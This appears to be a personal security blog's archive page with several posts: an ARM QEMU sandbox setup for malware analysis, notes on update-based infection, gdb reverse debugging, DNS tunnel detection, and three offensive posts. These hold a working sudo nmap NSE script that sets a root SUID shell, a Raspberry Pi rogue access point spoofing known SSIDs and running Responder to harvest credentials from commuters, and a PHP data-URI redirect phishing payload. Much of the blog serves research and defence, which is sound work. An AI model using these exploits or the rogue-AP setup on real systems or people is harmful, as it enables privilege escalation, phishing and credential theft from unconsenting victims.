mercredi 12 juillet 2017

qemu ARM VM for [crackme|malware] analysis

My setup for ARM analysis

Once in a while, I have to analyze linux binaries in ARM architecture (in CTF, or crackme or when I got an ARM malware). There is many way to do it:

  • do static analysis only (good for crackme)
  • buy a raspberry pi (good for crackme)
  • buy an ARM machine somewhere in the cloud (well, never tried it, but why not)
  • use virtual machines 

I choose personnaly virtual machine over other solutions because of dynamic analysis, snapshots, the availabilty of it and the free as in free beer \o/

1/ qemu ARM on x86_64

When you want to emulate an arch, you think at qemu. So, installing qemu is as simple as download and compile it, or apt-get it:

mitsurugi@dojo:~$ dpkg -l | grep qemu-system-arm
ii  qemu-system-arm                           1:2.8+dfsg-5                         amd64        QEMU full system emulation binaries (arm)

and you're done.

2/ disk image

Next, you have to grab a linux distro. It's really faster to use a preinstalled image than installing from an iso. There is a lot of documentation which point to . This works, but I don't recommend it. The kernel and images are really old, and for my needs, gdb was too old. Use another image, decently recent. I recommend a raspbian image, really good for this usage.

I have scripts to automatize the process of downloading and configuring disk image for qemu-system-arm.

First, an a udev rule:

mitsurugi@dojo:~/chall/armv6_stretch$ cat 90-qemu.rules 
KERNEL=="sda", SYMLINK+="mmcblk0"
KERNEL=="sda?", SYMLINK+="mmcblk0p%n"
KERNEL=="sda2", SYMLINK+="root"

And the script to get and create the disk image:

mitsurugi@dojo:~/chall/armv6_stretch$ cat 
set -x
unzip raspbian_latest && rm raspbian_latest
loopdev=`sudo losetup -f`
img=`echo *.img`
offset=`file $img | grep -oh 'startsector [^,]*' | tail -n 1 | cut -d' ' -f2`
sudo mkdir -p $mntdir
sudo chown root:root $mntdir
sudo losetup --offset $offset $loopdev $img
sudo mount $loopdev $mntdir
sudo bash -c "echo > $mntdir/etc/"
sudo cp 90-qemu.rules $mntdir/etc/udev/rules.d
sudo umount $mntdir
sudo losetup -d $loopdev
qemu-img convert -O qcow2 -f raw $img raspbian.qcow2
rm $img

Now you'll have a .qcow2 raspberry disk image and a linux kernel.
(those two scripts are slightly modified from website, down at this moment)

3/ network setup

For my needs, I don't want to be bridged, I want to be able to firewall or block network access for the VM.
I don't want to use user-mode-nat, because firewalling can be too hard to put in place.
The good setup is TUN-TAP mode.

From the host, you have an interface tap0. The guest is connected to the host with this interface.
You can do your setup as you like, masquerade the guest to give internet access, firewall it, give static or dynamic addresse. Do as you want. I did a really simple setup (every docs on the internet overcomplicate this tasks).

First create your tap0 interface and give rights to your user, then configure it:

mitsurugi@dojo:~/chall/armv6_stretch$ cat
echo "[+] Configuring interface"
sudo tunctl -t tap0 -u mitsurugi
sudo ifconfig tap0

In the VM, configure the IP to be or any IP in 172.16.42.X range.

This is really simple and powerfull because you can even configure a private IP address (if things are hardcoded in the binary you want to analyze) like

mitsurugi@dojo:~/chall/armv6_stretch$ sudo ifconfig tap0

and configure anything you need on the host side. I recommend dnsmasq which can act as a DHCP and DNS, with very little configuration. You can even lie to any DNS request you want, set up HTTP servers, ftp servers, mitm all the things \o/

4/ Command line to launch the image

The command line is:

mitsurugi@dojo:~/chall/armv6_stretch$ cat 
#! /bin/bash
qemu-system-arm -cpu arm1176 \
                -m 256 \
                -kernel kernel-qemu-4.4.34-jessie \
                -M versatilepb \
                -append "root=/dev/sda2 rootfstype=ext4 rw console=ttyAMA0" \
                -hda raspbian.qcow2 \
                -net nic \
                -net tap,ifname=tap0,script=no,downscript=no $1

Nothing fancy, you can't use more than 256M of RAM, and the net is made through tap, without any script (because you just configured it by yourself).

Be prepared for the first boot to configure a lot of things.

At first, use the qemu serial console (CTRL-ALT-3 when you see the strawberry logo on black screen) and log in. Why the serial console? Because you won't have any keyboard problem. The raspbian is configured to use QWERTY US keyboard. The serial console use your keyboard layout. The default login/pass is pi/raspberry  and you can use sudo to get root rights.

5/ First boot

Configure network, hostname, passwords, add a user, give root a password (eventually), d/l and configure all your analysis tools (gdbinit, scripts and so on), remove all the stuff you don't care about. And, reboot! Is everything OK? ssh works? Good!
You can forgot the CTRL-ALT-3 serial line and use ssh from now on.

Personnaly, I don't set up a default gw for the VM. This way, I'm almost sure than any malware I launch in it won't scan my internal network or the internet. This can be configured after on a case to case basis.

I set up the hostname as "router". If ever a malware would scan the hostname, it won't be an obvious name like "VM1" or "sandbox" or "analysis".

6/ Snapshotting for the win

The really good part about qemu is the -snapshot switch. This switch is made for a one-time snapshot. Whith it, anything is written on disk. When you poweroff the VM, every change made is lost. That's really, really good if you want to launch a malware. Even if this malware gain persistance to disk, modify files, or even trash your hard disk, it doesn't matter. Launch binary, look, modify things, trash VM, relaunch it. Very convenient. Don't forget to track and log every action in a scratchpad on your host because you can lost all of your work.

mitsurugi@dojo:~/chall/armv6_stretch$ ./ -snapshot
(do your stuff... Then halt the VM)


The VM is in clean state. For me, that's the hugest win. No need to clean up tracks leaved by the malware, no need to reconfigure things. Reboot machine -> you're done. You can even hard stop it by closing the qemu windows.

Qemu has another option, with persistent snapshot. The disk image is used as a "base" image, and another file is used as a snapshot. This way, you can stop and reboot, any changes are stored in the snapshot file. If you want to restore the clean, initial state, just trash the snapshot file and launch qemu with the base image (see qemu documentation). I never had to use it.

99/ Conclusion

This setup will allow you to launch and analyze any ARM binary in a relative security. I'm not aware of any qemu escape ARM to x86_64, and the network setup allows you to easily block requests to the outside world and simulate all the things.

jeudi 29 juin 2017

Infection as automatic update

0/ Intro

Everybody is talking about Petya^WNotPetya^WGolde^WPetWr^WAPT2^Wwhatever, and security researcher are doing their best in order to understand all the gory details under this so-called ransomware (or wiper?). Let them continue to do this hard work (thanks guys/girls for you to exist and provide insights), I want to focus on a specific point: the Infection Vector.

1/ Infection Vector

At this time of writing, the infection vector seems to come from M.E.Doc. M.E.Doc is a company which seems related to tax payment and accounting. I didn't checked, but news said it's widespread, and the home page has a direct link to updates:

The alleged vector worked like this:

  • M.E.Doc was hacked (or a part of it)
  • The automatic update feature was abused
  • All users of M.E.Doc software downloaded a malware instead of a legitimate update

This reminds the waterholing way to infects users, where you infect website visited by your victims. But waterholing is hard because you need to have some 0days to infect your victims.

The infection vectors turns automatic updates to infection!

2/ The importance of this new vector

And that point is new. This is a nice and clean infection vector:

  • You can target precisely your users if you want (think APT, espionage) or widespread (think ransomware, banking trojan), just choose your software to update!
  • No need to search for 0day! The role of update mechanism is to download, execute and install software
  • Bypass everything: Administrators have already authorized automatic updates, whitelisted sites, and give rights for updates. Yes, because every security guy/girl shoots "DO UPDATES! ALWAYS! MANDATORY! NOW!" (And yes, I'm the first one to say it).

I think that's the main information to learn from this attack. A new vector is in town, how can we handle it to control its damage power. When your legitimate tools evolve into deadly weapon that bites you, how can you survive?

3/ attack surface

I've booted my windows VM, and just let it run. I got some warning about the update of winSCP, openoffice and firefox (yep, I don't boot it often).
I wonder how many program are updated through their own channels. We know that some update domains are still in plain HTTP, some other are not digitally signed, and do we know if updaters check the signatures, etc..

Worst, I wonder how many legit programs are outdated, abandoned, and for whom DNS update domains are now for sale. Look for old software, search for domain, buy them, and you have an attack vector. You won't get many victims, but it can become really targeted if a company still use one of those abandoned software. Is there any domain containing "update" in this list today:  ?

I'm not even speaking of all DNS related problems bitsquatting or just the forgotten payment for the domain, or DNS hijacking, etc..

z/ Outro

If the security researcher are right, you don't have to care for this malware. It was a one shot fire and it won't be triggered again.

However, I think it's urgent to check all your software base, verify all of those download points, and verify the mechanism. Signatures and/or PGP base updates won't help because you have to take into account that all of the update infrastructure can be corrupted. So, in probability, the search for quick win pirates will search for non digitally signed updates, then for HTTP (in case of MITM), and only after weak updates websites.

In other word, I'll prepare backups and recovery plans.

vendredi 14 avril 2017

Privilege escalation with a sudo nmap

1/ Intro

Do you miss the good old days where nmap got an --interactive option? This option was mostly used to gain root privileges in the case if nmap was suid or sudo-able. This option has been deprecated and removed from nmap:
This option is rarely used and doesn't work

This day was a bad day for pentester: no more priv esc with nmap :-(

So an admin can give nmap to its users without any risks? I think not, and I'll explain why.

2/ Nmap scripting engine in action

nmap is a very powerful tool which can be extended through lua scripts. We will use this to gain root privileges:
  • nmap can launch any nse scripts
  • nse scripts can call os.execute(" system commands ")
You can read docs on the nmap website.

3/ Sample nse script

I did a really simple script:
mitsurugi@dojo:~$ cat got_root.nse 
-- The Head Section --
description = [[If nmap is suid or you have sudo nmap rights
this script suid a local binary called binsuid]]
author = "0xMitsurugi"
license = "Same as Nmap--See"
categories = {"default", "safe"}

-- The Rule Section --
hostrule = function(host)
    return host

-- The Action Section --
action = function(host)
    os.execute("echo got_root ; id > /tmp/owned")
    os.execute("[ -f binsuid ] && chown root.root binsuid")
    os.execute("[ -f binsuid ] && chmod +s binsuid")
    return "suid nmap priv escalation"

We have a hostrule, which is basically always true if host is up. We will scan so, the action will start.
The action just chown and chmod a file called binsuid in the local folder.

4/ full session

Let's imagine that a user can launch nmap through sudo without the need of a password.
Here is how to gain root privileges: Create a binary giving you a shell, use the nse script which will give suid rights to it. You're done.

mitsurugi@dojo:~$ cat binsuid.c 
#define _GNU_SOURCE 
void main() {
mitsurugi@dojo:~$ gcc -o binsuid binsuid.c
mitsurugi@dojo:~$ ls -l binsuid
-rwxr-xr-x 1 mitsurugi mitsurugi 8744 avril 14 10:56 binsuid
mitsurugi@dojo:~$ sudo nmap -p 1337 --script got_root.nse

Starting Nmap 7.40 ( ) at 2017-04-14 10:55 CEST
Nmap scan report for localhost (
Host is up (0.000026s latency).
1337/tcp closed waste

Host script results:
|_got_root: suid nmap priv escalation

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
mitsurugi@dojo:~$ ls -l binsuid
-rwsr-sr-x 1 root root 8744 avril 14 10:55 binsuid
mitsurugi@dojo:~$ ./binsuid 
bash-4.4# id
uid=0(root) gid=1001(mitsurugi) groupes=1001(mitsurugi),27(sudo),29(audio),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),122(kismet)

Ok, root rights acquired, job done.

5/ Outro

Lot of fun
Enjoy responsibly \o/ (and pwn everything!)

Ever tried. Ever failed. No matter. Try Again. Fail again. Fail better.
~Samuel Beckett


mercredi 22 février 2017

Stepping backward in gdb

0/ Intro

Yesterday, I discover an awesome feature of gdb: the concept of recording, and stepping backward in a binary.

You read it good! With gdb, you can run a binary step some instructions and then reverse your steps. You can even change values in memory or register, and continue execution.
It's a feature I've searched for solving crackmes. Usually, in crackme you try some passwords, step through functions and subfunctions, then branches are taken depending on the password, and sometimes, you just want to step backward in order to try another branch.
I've never imagined that it's possible with a vanilla gdb.

Reference doc:

1/ A heavy weight crackme!

Here is an example of a crackme:

 mitsurugi@dojo:~/chall/reverseGDB$ cat heavyweightcrackme.c   
 #include <stdio.h>  
 #include <stdlib.h>  
 #include <string.h>  
 int heavycalc(char *s) {  
      int a=0;  
      printf("\tBig computation in subfunction\n");  
      return a;  
 int main(int argc, char *argv[]) {  
      printf("Another Crackme\n");  
      if (heavycalc(argv[1]) == 6){  
           printf("Good Boy\n");  
      else {  
           printf("Bad boy\n");  

Nothing really hard, that's just for the demonstration.
The reverser have to input a 6 character long password in order to get the "Good boy" message. Any other length will tell "Bad Boy". The calculation is made in a subfunction.

2/ Reverse stepping GDB in action!

Just use your favorite gdb (higher than v7).

 mitsurugi@dojo:~/chall/reverseGDB$ gdb -q -nx heavyweightcrackme   
 Reading symbols from heavyweightcrackme...(no debugging symbols found)...done.  
 (gdb) b * main  
 Breakpoint 1 at 0x723  
 (gdb) r aaaa  
 Starting program: /home/mitsurugi/chall/reverseGDB/heavyweightcrackme aaaa  
 Breakpoint 1, 0x0000555555554723 in main ()  
 (gdb) record  

Here, we start the recording. Everything will be recorded, memory, breakpoints, registers, flags and so on. Gdb will be able to step backward and forward since that point.

 (gdb) c  
 Another Crackme  
      Big computation in subfunction  
 Bad boy  
 The next instruction is syscall exit_group. It will make the program exit. Do you want to stop the program?([y] or n) yes  
 Process record: inferior program stopped.  
 Program stopped.  
 0x00007ffff7af34c6 in __GI__exit (status=status@entry=0) at ../sysdeps/unix/sysv/linux/_exit.c:31  
 31     ../sysdeps/unix/sysv/linux/_exit.c: Aucun fichier ou dossier de ce type.  

Ok, we fail at solving this challenge, and we see the "Bad boy" message. (Protip: when gdb ask you to stop the program, answer yes, you will stay in the recorded session).
The magic begins here, with a reverse-continue. It will fast forward until a breakpoint. We have only one, at main.
 (gdb) reverse-continue   
 No more reverse-execution history.  
 0x0000555555554723 in main ()   
 (gdb) disass main  
 Dump of assembler code for function main:  
 => 0x0000555555554723 <+0>:     push  %rbp  
   0x0000555555554724 <+1>:     mov  %rsp,%rbp  
   0x0000555555554727 <+4>:     sub  $0x10,%rsp  
   0x000055555555472b <+8>:     mov  %edi,-0x4(%rbp)  
   0x000055555555472e <+11>:     mov  %rsi,-0x10(%rbp)  
   0x0000555555554732 <+15>:     lea  0xef(%rip),%rdi    # 0x555555554828  
   0x0000555555554739 <+22>:     callq 0x555555554590 <puts@plt>  
   0x000055555555473e <+27>:     mov  -0x10(%rbp),%rax  
   0x0000555555554742 <+31>:     add  $0x8,%rax  
   0x0000555555554746 <+35>:     mov  (%rax),%rax  
   0x0000555555554749 <+38>:     mov  %rax,%rdi  
   0x000055555555474c <+41>:     callq 0x5555555546f0 <heavycalc>    //Seems interesting  
   0x0000555555554751 <+46>:     cmp  $0x6,%eax  
   0x0000555555554754 <+49>:     jne  0x555555554764 <main+65>  
   0x0000555555554756 <+51>:     lea  0xdb(%rip),%rdi    # 0x555555554838  
   0x000055555555475d <+58>:     callq 0x555555554590 <puts@plt>  
   0x0000555555554762 <+63>:     jmp  0x555555554770 <main+77>  
   0x0000555555554764 <+65>:     lea  0xd6(%rip),%rdi    # 0x555555554841  
   0x000055555555476b <+72>:     callq 0x555555554590 <puts@plt>  
   0x0000555555554770 <+77>:     mov  $0x0,%eax  
   0x0000555555554775 <+82>:     leaveq   
   0x0000555555554776 <+83>:     retq    
 End of assembler dump.  

From now on, we can single step through the binary, examinate memory, add breakpoints (yeah, dynamically!). The heavycalc function seemes interesting because it's return value is checked.
 (gdb) b * 0x000055555555474c  
 Breakpoint 2 at 0x55555555474c  
 (gdb) c  
 Breakpoint 2, 0x000055555555474c in main ()  
 (gdb) nexti  
 0x0000555555554751 in main ()  
 (gdb) info reg rax  
 rax      0x4     4  

And we can change the execution flow. We see that the rax is compared to six. What happens if we set a 6?Obviously, from now on, the subsequent execution log is deleted and a new execution log starting from the current address will be recorded. This means we will abandon the previously recorded "future" and begin recording a new "future".
 (gdb) set $rax=6  
 Because GDB is in replay mode, changing the value of a register will make the 
execution log unusable from this point onward. Change register rax?(y or n) y 
 (gdb) c  
 Good Boy  
 The next instruction is syscall exit_group. It will make the program exit. 
Do you want to stop the program?([y] or n) yes  
 Process record: inferior program stopped.  
 Program stopped.  
 0x00007ffff7af34c6 in __GI__exit (status=status@entry=0) at ../sysdeps/unix/sysv/linux/_exit.c:31  
 31     in ../sysdeps/unix/sysv/linux/_exit.c  

Yeah! We have a "Good boy" message. So, it means that heavycalc have to return 6 in order to win. But what do we have in "heavycalc"? Easy, just step backward, and dive into this function:
 (gdb) reverse-continue   
 Breakpoint 2, 0x000055555555474c in main ()  
 (gdb) x/10i $rip  
 => 0x55555555474c <main+41>:     callq 0x5555555546f0 <heavycalc>  
   0x555555554751 <main+46>:     cmp  $0x6,%eax  
   0x555555554754 <main+49>:     jne  0x555555554764 <main+65>  
   0x555555554756 <main+51>:     lea  0xdb(%rip),%rdi    # 0x555555554838  
   0x55555555475d <main+58>:     callq 0x555555554590 <puts@plt>  
   0x555555554762 <main+63>:     jmp  0x555555554770 <main+77>  
   0x555555554764 <main+65>:     lea  0xd6(%rip),%rdi    # 0x555555554841  
   0x55555555476b <main+72>:     callq 0x555555554590 <puts@plt>  
   0x555555554770 <main+77>:     mov  $0x0,%eax  
   0x555555554775 <main+82>:     leaveq   
 (gdb) stepi  
 0x00005555555546f0 in heavycalc ()  
 (gdb) disass heavycalc   
 Dump of assembler code for function heavycalc:  
 => 0x00005555555546f0 <+0>:     push  %rbp  
   0x00005555555546f1 <+1>:     mov  %rsp,%rbp  
   0x00005555555546f4 <+4>:     sub  $0x20,%rsp  
   0x00005555555546f8 <+8>:     mov  %rdi,-0x18(%rbp)  
   0x00005555555546fc <+12>:     movl  $0x0,-0x4(%rbp)  
   0x0000555555554703 <+19>:     lea  0xfe(%rip),%rdi    # 0x555555554808  
   0x000055555555470a <+26>:     callq 0x555555554590 <puts@plt>  
   0x000055555555470f <+31>:     mov  -0x18(%rbp),%rax  
   0x0000555555554713 <+35>:     mov  %rax,%rdi  
   0x0000555555554716 <+38>:     callq 0x5555555545a0 <strlen@plt>  
   0x000055555555471b <+43>:     mov  %eax,-0x4(%rbp)  
   0x000055555555471e <+46>:     mov  -0x4(%rbp),%eax  
   0x0000555555554721 <+49>:     leaveq   
   0x0000555555554722 <+50>:     retq    
 End of assembler dump.  

And we can inspect memory again, etc, etc..

3/ Outro

This feature is AWESOME \o/
The concept of stepping backward, forward, inspecting memory and so on is full of fun. My next cracking session will be recorded, replayed and enhanced.
The gdb documentation gives a lot of options, actions and possibilities, this blogpost is just here to show a minimal reverseGDB sessions.

And the irony of reversing gdb while reversing binaries strikes on me :)

Winners trains. Loosers complains.

jeudi 16 février 2017

All your credz are belong to me. When raspi meets wifi sniffing.

1/ A wild Raspberry appears!

Two weeks ago, I won in a CTF a raspberry Pi3. After toying a little with the ARM CPU, I decided to make something offensive with this raspi. As you may know, the raspberry 3 comes with an integrated Wifi card, and it's powered with an USB cable:
We don't clearly see the wifi card, but it's here :-)

On the other hand, I have a neat little rescue battery for my phone:
A battery full of energy

This battery delivers 800mA, and its enough to power the raspberry for more than two hours (maybe more, but I never tried for more than two hours and it's largely enough for me). With this setup, I have a portable raspberry and I can walk anywhere.

The idea is to configure the raspberry as an access point, and wait for innocents smartphones to connect with it. Listen the network, then grab as much data as possible. Free credz for me \o/  This kind of tests have been made in the past, but I just want to test it by myself.
It ended to be incredibly easy to setup and successfull.

2/ Setup everything

We need three parts: create an access point, set up some honeypots to gather credz, and sniff data. Once OK, launch everything at boot.

2/1/ Access Point

Before creating the access point, we have to configure the wifi card, and setup a DHCP server.
Add those lines in /etc/network/interfaces:
 allow-hotplug wlan0   
 iface wlan0 inet static   

Next, install dnsmasq, and create a specific conf file, only for answering DHCP requests:
 root@raspberrypi:~# mv /etc/dnsmasq.conf /etc/dnsmasq.conf.ori  
 root@raspberrypi:~# cat /etc/dnsmasq.d/dnsmasq.conf   
 # Listen on this specific port instead of the standard DNS port  
 # (53). Setting this to zero completely disables DNS function,  
 # leaving only DHCP and/or TFTP.  
 interface=wlan0   # Use interface wlan0   
 listen-address= # Explicitly specify the address to listen on   
 bind-interfaces   # Bind to the interface to make sure we aren't sending things elsewhere   
 domain-needed    # Don't forward short names   
 bogus-priv      # Never forward addresses in the non-routed address spaces.   
 dhcp-range=,,12h # Assign IP addresses between and with a 12 hour lease time   
 # DNS is managed by another process, which will send rogue response  

And installing the AP is very straightforward:
 root@raspberrypi:~# apt-get install hostapd  
 create a file /etc/hostap/hostapd.conf  
 root@raspberrypi:~# cat /etc/hostapd/hostapd.conf  
 #Configure the name of the SSID to fulfill your needs  
 ssid=My Test SSID  
 #Warning, this is the configuration for a full Open AP. Anybody can use it.  
 #Don't use it without knowing what you do

Launch it with
 root@raspberrypi:~# hostapd -d /etc/hostapd/hostapd.conf  

You shoud see the SSID "My Test SSID" in any Wifi Device, and connection should work. You won't get internet access, but we don't need it.

2/2/ Honeypoting

I decided to reuse Responder, which is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. It's designed for windows (netbios, and so on) in mind but it works with any smartphone/tablet because of all authentications server.

Once again, really easy:
 root@raspberrypi:~# git clone  
no configuration file is needed, anything works out of the box. Nice.

2/3/ Sniffing

We will sniff with tcpdump.
 root@raspberrypi:~# apt-get install tcpdump  

2/4/ Launch everything at boot

As I will used this raspberry in my pocket, it must be able to launch everything at boot without ant interaction, then regain access while plugged in a computer with SSH access. For that, I'm using screen and a systemd unit file:
 root@raspberrypi:~# cat /etc/systemd/system/screen_AP.service   
 Description=screen for AP  
 ExecStart=/usr/bin/screen -c /root/screen_AP  

And the screen_AP file launch three tabs, then detach:
 root@raspberrypi:~# cat screen_AP   
 startup_message off  
 defscrollback 100000  
 screen -d -m -t AP hostapd -d /etc/hostapd/hostapd.conf  
 chdir /root/Responder  
 screen -d -m -t Responder ./ -I wlan0 -bwrf  
 screen -d -m -t tcpdump tcpdump -s0 -n -i wlan0 -w /root/AP.pcap  
That's it, you're done!

The Pi will boot, setup the wlan0 card, launching it as an AP (dnsmasq start with its own unit file), launch Responder and sniff everything.

3/ Playground

My tests have shown that association is not so easy to achieve
  • A smartphone won't connect to any open wifi magically
  • A smartphone take some long seconds to associate: You can't just walk in the street waiting for phone to connect.
Those two problems can be solved. First, I reuse some well-known SSID names such as "Starbucks", "Apple DEMO", "orange" or "FreeWifi" (I'm in france and those two last names are french ISP providing open wifi) and so on.

Second, for the delay made by the connecting time, I choose the subway. People are standing still for some minutes, and eventually they can be tempted to connect to an open Wifi network. Moreover, subway here doesn't have any cell networks, so phone would be more tempted to join wifi networks I guess.

Let's try
The subway will make a stop to Sniffing Station!

4/ Results

It works. Not really well, but it works, I had connections. For example, with the SSID "Apple Demo" (the ssid available in any apple store) I have associations and connections to and so on..

For the credz, nothing will be published here, and I can't deny nor confirm anything about them ^_^

The main problem I'm facing is the SSID name. Very unfortunately, the wifi card in the Pi3 can only manage one SSID:
 root@raspberrypi:~# iw list  
 Wiphy phy0  
      valid interface combinations:  
            * #{ managed } <= 1, #{ P2P-device } <= 1, #{ P2P-client, P2P-GO } <= 1,  
             total <= 3, #channels <= 2  
            * #{ managed } <= 1, #{ AP } <= 1, #{ P2P-client } <= 1, #{ P2P-device } <= 1,  
             total <= 4, #channels <= 1  
      Device supports scan flush.  
total AP <= 1 , such a bad luck :-(

I can make rolling SSID names, but having 8 SSID at the same time would have been so nice :)

Next step could be:
  • Enhance the AP part with:
    • buying an external USB wifi card :-/
    • roll SSIDs names every 3-4 minutes, but that's unsatisfying
  • Enhance the Responder part with more honeypots and better HTTP response
    • Usually, apps and OS do a GET to a known domainname and wait for a specific string

Good side effects is that I can use the SSID to connect to the raspberry with my phone, thanks to ConnectBot and see logs in real time :-)

5/ Conclusion

That was fun to setup and to see the logs.
Note to myself: be sure than Wifi on my smartphone is turned off :-)

"Cry in the dojo. Laugh on the battlefield."
~ Author unknown

lundi 12 décembre 2016

Yet another phishing in Firefox with data URI and 302 redirect

1/ Introduction

Little known fact: you can redirect HTTP to a data URI.

2/ Let's have fun with redirect

Create a php file:
 header("Location: data:text,Hello World");  
and serve it for Firefox. In all its glory, Firefox will print "Hello World!"

3/ Enhance with phishing

And yes, you can use HTML instead of pure text. And with HTML, you can do what you want. And the beginning of the data: URI will be printed in the adress bar. Looks good for having fun.
  • First, add HTML capabilities:
  • Second, trick user in address bar, because address bar will print the content of data: scheme: 
  • Third, add some HTML (and clean up)
    <HTML><html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>
  • Fourth, be nice by adding a pretty thing in Tab bar of Firefox: Google

4/ Ready to go:

Create a php file like this:

 $data_uri = "data:text/html,";  
 $decoy = "";  
 $evil_html = "<html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>";  
 $pretty_tab_print = "Google";  
 $redirect_url = $data_uri . $decoy . $evil_html . $pretty_tab_print;  
 header("Location: " . $redirect_url);  

And trick a user to go to this page (you know, phishing stuff, with or any url shortener):

A click on this php file served through a webserver will drive you to:

4/ Is it something new?

Well, yes and no.
Phishing with data URI is known for a veeery long time. A paper has been published some time ago
this is the same idea, I've added the vector with the 302 Redirect.

It's not a big deal, if you're tricked by this, you can be tricked by anything else.

lundi 5 décembre 2016

Finding DNS tunnels by analyzing network captures

DNS tunnels is a method used to exchange data on top of DNS traffic. It's generally used to bypass some filtering equipement to communicate between two hosts.

This article is about the detection of a DNS tunnel. Can we find DNS tunnels by analyzing a pcap offline? We will see that the first basic solution (counting subdomain for a domain) is prone to a high number of false positive when applied to real DNS data. We will then propose another approach wich could help for DNS Tunnel detection

1/ DNS tunnels: the theorical part

The theory here is super easy. If a client in a protected network can send DNS requests and receive response, then you can mount a DNS tunnel.

Clients sends encoded data for a specific subdomain of attacker domain and waits for the answer. This way, data is exchanged. The client just have to pay attention to make unique DNS requests, in order to avoid caching of an intermediary DNS server. Thanks to the multiple type of DNS requests, and to the size of requests, you can get some enough decent bandwidth to do an ssh session.

You can find a lot of resources for building DNS tunnels with a lot of tools: iodine, dnscapy, dnscat2, etc etc.. Those tools provide usually some encryption and helpers to exchange data.

2/ Finding should be super easy by counting requests

The most obvious way to spot a DNS tunnel should be counting the number of subdomain for a specific domain. For each chunk of data, client have to build a new DNS name for the domain owned by attacker.

I captured some DNS traffic while using a DNS tunnel (dnscat2 in that case). I estimate that we can type a lot of harmfull bash commands in dnscat2 in less than 50 DNS requests. Let's use 50 as a threshold: if a domain has more than 50 subdomain, then you can flag it as a DNS tunnel

3/ Ok, let's do it the dirty way: bash+python

There are a lot of way to analyze data, I choose a splitted approach:
  • at first, extract interesting data with tshark and bash to a flat file
  • tshark -2 -r "$1" -R "dns.flags.response == 1" -T fields -e > doms_qry
  • then analyze data with python
This way is convenient for me because I have easy access to the flat file after extraction and before analysis.

mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./ ../dnscat2.pcap
Copied unique domains in doms_qry
Number of domains copied: 244 doms_qry
mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 6 labels

Longest domain name is 235 char long:

######### Following domains ###########
Interesting tld for rank 0
 tux(243 subdomains)

######### Following domains ###########
Interesting tld for rank 1
 dnscat2.tux(243 subdomains)

You should investigate on domains
    dnscat2.tux  (243 subdomains)

That works remarkably well. If you find this kind of data in your DNS logs, you should investigate quickly.

4/ But, does this work in real life? (spoiler: no)

Well, this work in a test lab. Now, how does this work in real?
I have to say that it's incredibly hard to find real DNS data. See end of blog for details, but I had the chance to put hands on two full pcap capture from an university. I have to name and thanks ISCX : data is legit for research and analysis. Really a big thanks.

Now, I use the exact same programs and let's try if we can find DNS tunnels in those captures:

 mitsurugi@dojo:~/DNS_analyzer/analyze_doms$ ./

Longest domains is constitued of 8 labels fool! Don't make me laugh!
~Soulcalibur - Mitsurugi

Longest domain name is 59 char long:

######### Following domains ###########
Interesting tld for rank 0
 au(54 subdomains); net(1502 subdomains); gov(53 subdomains); jp(96 subdomains); org(195 subdomains); com(3181 subdomains); uk(91 subdomains)

######### Following domains ###########
Interesting tld for rank 1 subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains); subdomains)

######### Following domains ###########
Interesting tld for rank 2 subdomains); subdomains)

You should investigate on domains  (146 subdomains)  (121 subdomains)  (105 subdomains)  (98 subdomains)  (87 subdomains)  (73 subdomains)  (68 subdomains)  (54 subdomains)  (52 subdomains)  (51 subdomains)

OK, so that's a full list of false positive. If I raise the threshold higher, then I can miss some short living DNS tunnel.

I think that we can clearly say that counting the number of subdomain doesn't work in practice.

5/ Can we do better? (spoiler: yes, sort of)

We have some options here:

5/1/ whitelisting domains

I don't like the idea of whitelisting. Usually, maintaining such lists are pita, but it can help you.

5/2/ analyzing only requests of type other than 'A' (and 'AAAA').

Well, you'll end up with a lot of MX and/or SPF records, that's still a good way to lower the noise, but it should help. I didn't see any DNS tunnels relying on A or AAAA type, but hackers have a lot of imagination.

5/3/ calculating entropy of domain.

Yeah, it should works. But you will face other problems: cdn names can look like random, MX name can look totally legit while being DNS data tunnels. More and more file reputations and cloud antivirus relies on TXT DNS requests... and they look totally likes DNS tunnels (a lot of different TXT requests going to the same domain). So, try at your own risks.

5/4/ Analyzing DNS response instead of requests.

It would be a lot better, combined with the previous one. Still, an hacker would be able to use AAAA or A records to exchange data (throughput of tunnel would be lowered by an order of magnitude, but hackers have a lot of time...)

5/5/ Raising threshold

It could work, but we have to agree on a number not to high, not to low. In the end, we must rely to human analysis, and it can't work that way.

6/ Lessons learned

They are some lessons here:

Counting subdomains doesn't work

No, counting subdomains doesn't work at all. It can helps do lower the size of data to analyze, but you can't trust it for sure.

It's hard to grab DNS data (really.) 

Sad but true. If you want to share DNS data with me (or know place where you can have some), I would be grateful. Beware, DNS data is an impressive way to gather metadata and has a lot of privacy concerns.

Parsing DNS data is not that easy. 

Everybody think they know DNS: "you ask a fqdn, you get an IP" and it's WRONG! You can end up with a lot of RR, multiple queries, UDP and TCP, endless CNAME requests, and so on. For this kind of research a flat file is enough, but I have to find better way to parse and analyze this kind of structured data.

...and beyond

You can find a LOT of things inside DNS data (more blog posts to come)

You fool! Don't make me laugh!
~Soulcalibur - Mitsurugi